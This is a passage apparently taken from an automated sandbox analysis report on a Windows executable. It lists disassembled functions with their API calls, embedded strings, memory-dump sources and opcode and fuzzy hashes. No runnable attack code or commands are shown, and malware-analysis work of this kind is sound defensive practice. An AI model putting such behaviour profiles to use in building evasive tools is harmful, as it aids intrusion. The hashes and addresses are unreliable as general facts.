                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ??3@mallocmemcpy
                                • String ID:
                                • API String ID: 3831604043-0
                                • Opcode ID: a85243c3274abcf257bc8a1d0c36c9fb31ec9b9764bc30e3ac6d524e65cdc455
                                • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                • Opcode Fuzzy Hash: a85243c3274abcf257bc8a1d0c36c9fb31ec9b9764bc30e3ac6d524e65cdc455
                                • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00417570, Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                Download Yara Rule
                                APIs
                                • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                • GetLastError.KERNEL32 ref: 004175A2
                                • GetLastError.KERNEL32 ref: 004175A8
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ErrorLast$FilePointer
                                • String ID:
                                • API String ID: 1156039329-0
                                • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00415321, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • failed memory resize %u to %u bytes, xrefs: 00415358
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: realloc
                                • String ID: failed memory resize %u to %u bytes
                                • API String ID: 471065373-2134078882
                                • Opcode ID: 3434da1dbcbe40749f7bb19bb969ba9348cca2f332a45bcd3c57ad1b142d0162
                                • Instruction ID: fa0be88ae63bf8e7a0ec1cbb838f3bc130d20eb0a75070b99cf9e4f37552e13a
                                • Opcode Fuzzy Hash: 3434da1dbcbe40749f7bb19bb969ba9348cca2f332a45bcd3c57ad1b142d0162
                                • Instruction Fuzzy Hash: 6EF05CB3A01705E7D2109A55DC418CBF3DCDFC0755B06082FF998D3201E168E88083B6
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00437371, Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 243COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID:
                                • String ID: d
                                • API String ID: 0-2564639436
                                • Opcode ID: 8b82e4f5ef2bc7d58288eb7d352e73fde76eaac7bad66d9443978647085fe40b
                                • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                • Opcode Fuzzy Hash: 8b82e4f5ef2bc7d58288eb7d352e73fde76eaac7bad66d9443978647085fe40b
                                • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041EED2, Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memset
                                • String ID: BINARY
                                • API String ID: 2221118986-907554435
                                • Opcode ID: bc3d19a7d02c8d15955695c672ee8877c8483ff31dc40855ee5cfcc836beaa69
                                • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                • Opcode Fuzzy Hash: bc3d19a7d02c8d15955695c672ee8877c8483ff31dc40855ee5cfcc836beaa69
                                • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004104FB, Relevance: 3.1, APIs: 2, Instructions: 140COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                • GetStdHandle.KERNEL32(000000F5,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410530
                                • FindCloseChangeNotification.KERNELBASE(00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410654
                                  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                  • Part of subcall function 0040973C: GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                  • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                  • Part of subcall function 0040973C: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                                • String ID:
                                • API String ID: 1161345128-0
                                • Opcode ID: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                • Opcode Fuzzy Hash: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041268E, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _wcsicmp
                                • String ID: /stext
                                • API String ID: 2081463915-3817206916
                                • Opcode ID: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                • Opcode Fuzzy Hash: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040CC26, Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                • FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
                                • String ID:
                                • API String ID: 159017214-0
                                • Opcode ID: 8476b2a334a6ca3796266775e65a8fd449818afe434cc52dae5eff682d065e7e
                                • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                • Opcode Fuzzy Hash: 8476b2a334a6ca3796266775e65a8fd449818afe434cc52dae5eff682d065e7e
                                • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004152C7, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 26COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • failed to allocate %u bytes of memory, xrefs: 004152F0
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: malloc
                                • String ID: failed to allocate %u bytes of memory
                                • API String ID: 2803490479-1168259600
                                • Opcode ID: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                • Instruction ID: 0aa28a7b77b2060330bf56ee6aba3953d7f003d38adef6953018dc3bb0cf108c
                                • Opcode Fuzzy Hash: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                • Instruction Fuzzy Hash: 0FE026B7F01A12A3C200561AFD01AC677919FC132572B013BF92CD36C1E638D896C7A9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040B1AB, Relevance: 3.0, APIs: 2, Instructions: 14COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ??3@
                                • String ID:
                                • API String ID: 613200358-0
                                • Opcode ID: 4a6bf56a3c8e18f25b9487746213253c86c510b1b99403974ad2cc9a69351a87
                                • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                • Opcode Fuzzy Hash: 4a6bf56a3c8e18f25b9487746213253c86c510b1b99403974ad2cc9a69351a87
                                • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040B0B5, Relevance: 3.0, APIs: 2, Instructions: 7COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ??3@
                                • String ID:
                                • API String ID: 613200358-0
                                • Opcode ID: 536c2047bffc8dd9b34700d623eb618271f55ea3451f57cc7c37cab4f8277461
                                • Instruction ID: 93a37c1a4f050773dc1a5674df64ec50811fc8a39a1cc3e4a9db11821b00e242
                                • Opcode Fuzzy Hash: 536c2047bffc8dd9b34700d623eb618271f55ea3451f57cc7c37cab4f8277461
                                • Instruction Fuzzy Hash: A0B012310281004DEB057BA1B8061142302C64332E3B3413FE000500A3DE5D6034140F
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041BC3B, Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memcmpmemset
                                • String ID:
                                • API String ID: 1065087418-0
                                • Opcode ID: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                • Opcode Fuzzy Hash: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00418C63, Relevance: 2.6, APIs: 2, Instructions: 132COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memset
                                • String ID:
                                • API String ID: 2221118986-0
                                • Opcode ID: 91f73f7a852cbb4360dbb9cf7f888a1e4609bdf8e01f9823d17442fd23f8c43f
                                • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                • Opcode Fuzzy Hash: 91f73f7a852cbb4360dbb9cf7f888a1e4609bdf8e01f9823d17442fd23f8c43f
                                • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00403988, Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                  • Part of subcall function 0040A02C: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                  • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                  • Part of subcall function 0040A02C: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: File$Time$CloseCompareCreateHandlememset
                                • String ID:
                                • API String ID: 2154303073-0
                                • Opcode ID: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                • Opcode Fuzzy Hash: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004135F7, Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                • String ID:
                                • API String ID: 3150196962-0
                                • Opcode ID: be26bcaf2987f4035eeff70895753d9ab226293c41c78703657a1ba2214892b4
                                • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                • Opcode Fuzzy Hash: be26bcaf2987f4035eeff70895753d9ab226293c41c78703657a1ba2214892b4
                                • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00414561, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                Download Yara Rule
                                APIs
                                • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                  • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                  • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                  • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: PrivateProfile$StringWrite_itowmemset
                                • String ID:
                                • API String ID: 4232544981-0
                                • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00444A54, Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                Download Yara Rule
                                APIs
                                • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: FreeLibrary
                                • String ID:
                                • API String ID: 3664257935-0
                                • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00413F27, Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: AddressProc$FileModuleName
                                • String ID:
                                • API String ID: 3859505661-0
                                • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040A2EF, Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                Download Yara Rule
                                APIs
                                • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: FileRead
                                • String ID:
                                • API String ID: 2738559852-0
                                • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040A30E, Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                Download Yara Rule
                                APIs
                                • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,0041056A,00000000,004538EC,00000002,?,00412758,00000000,00000000,?), ref: 0040A325
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: FileWrite
                                • String ID:
                                • API String ID: 3934441357-0
                                • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00413D29, Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                Download Yara Rule
                                APIs
                                • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: FreeLibrary
                                • String ID:
                                • API String ID: 3664257935-0
                                • Opcode ID: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                • Opcode Fuzzy Hash: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040B633, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ??3@
                                • String ID:
                                • API String ID: 613200358-0
                                • Opcode ID: 708d35572adfbd8c0afef1fefac48864b5998db401338d2add0cc9d49b5fd8aa
                                • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                • Opcode Fuzzy Hash: 708d35572adfbd8c0afef1fefac48864b5998db401338d2add0cc9d49b5fd8aa
                                • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004096C3, Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                Memory Dump Source
